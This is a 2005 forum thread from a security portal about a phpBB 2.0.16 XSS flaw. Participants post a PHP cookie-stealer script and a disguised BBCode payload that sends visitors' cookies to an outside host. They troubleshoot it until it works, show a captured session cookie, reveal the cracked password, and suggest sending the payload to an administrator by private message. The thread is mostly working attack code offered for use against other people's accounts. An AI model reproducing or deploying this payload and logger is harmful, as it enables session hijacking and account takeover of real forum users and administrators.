Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 139
Members: 0
Total: 139
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Sun Jul 10, 2005 1:05 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>

how about this one ?
rename it to cookies.php

and try to access it by http://mysite.com/cookies.php
and see what you have inside http://mysite.com/cookies.txt

;0
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 1:14 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




using the code above.. rename it to cookies.php.. or what ever you want.


Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


have fun
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 1:15 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




when i call http://mysite.com/cookies.php
there's in cookies.txt :
Code:
Cookie: <br> IP: [color=#FF0000]myIP[/color]<br> Date and Time: 10 July, 2005, 3:11 pm<br> Referer: <br><br><br>


but when i try to use the exploit with this new cookies.php :
Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookies.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


the cookies.txt is empty Sad

edit : i tried the syntax you gave while i was posting :

Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]




An now it's working, great job subzero, i'd say you're certainly above (zero Wink).
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 1:30 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




Good then

only diff for that code was cookies.php?c=

happy hunting ;P pal
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 2:25 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




Ok i have something like this


REFERER=http://www.site.net/nothing/phpBB2/viewtopic.php?t=2
QUERY=phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";s:1:"2";}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

now what ? by what program/viewer i can use this cookie ?


c2150783216c11afea291d179e7b1902 is md5 hash ?


Last edited by WaterBird on Sun Jul 10, 2005 2:39 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:37 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




the password of this user : dupa400
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:40 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




verbatim wrote:
the password of this user : dupa400



Yea i know i just testing the exploit is there any posibilyty to do a jpg cookie stiller ? So i don;t have to use

http://www.antichat.ru/sniff/log.php
and
http://antichat.ru/cgi-bin/s.jpg

?? Any ideas ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:51 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. Wink
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:57 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




verbatim wrote:
a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. Wink



Yep i have try that one my cookie is empty !

Done the php file with

Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


in same directory/path created empty cookies.txt file with CHMOD 777

and in post i add

Code:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


And when i see the post on admin account file cookies.txt is still empty. Any ideas ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 3:10 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and im sure verbatism dont have problem too Wink

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 3:13 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




subzero wrote:
i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and im sure verbatism dont have problem too Wink

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/



Thx for hash pass cracker but i still don't understand why this php don;t wan't to work i have entered it by typing the url in to my ie and i get:

Code:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.33 Server at www.site.com Port 80





server nfo

Code:

Operating system FreeBSD
Service Status Click to View
Kernel version 4.11-STABLE
Machine Type i386
Apache version 1.3.33 (Unix)
PERL version 5.8.5
Path to PERL /usr/bin/perl
Path to sendmail /usr/sbin/sendmail
Installed Perl Modules Click to View
PHP version 4.3.10
MySQL version 4.0.18
cPanel Build 10.2.0-CURRENT 89
Theme cPanel X v2.5.0
Documentation Click to View
cPanel Pro 1.0 (RC26)
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 3:32 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>


rename to cookies.php

and make new one cookies.txt

with chmod 777 inside the same directory.
i put mine in root directory /

mmm good luck.
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 3:52 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




ok i have put this php file in root directory and it's working thx :}
Btw to all intrested maybe you know it but you don't have to post in topic or do a new one you can just send a msg to admin and paste the code in the msg :}

Cheers and thx for help !! Many thx !
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 5:39 pm Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




Btw any idea how to fix this hole ? Phpbb don't know about it yet ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 5:48 pm Reply with quote
700G
Active user
Active user
Joined: Mar 25, 2005
Posts: 33




Works very good Very Happy
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 8
Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds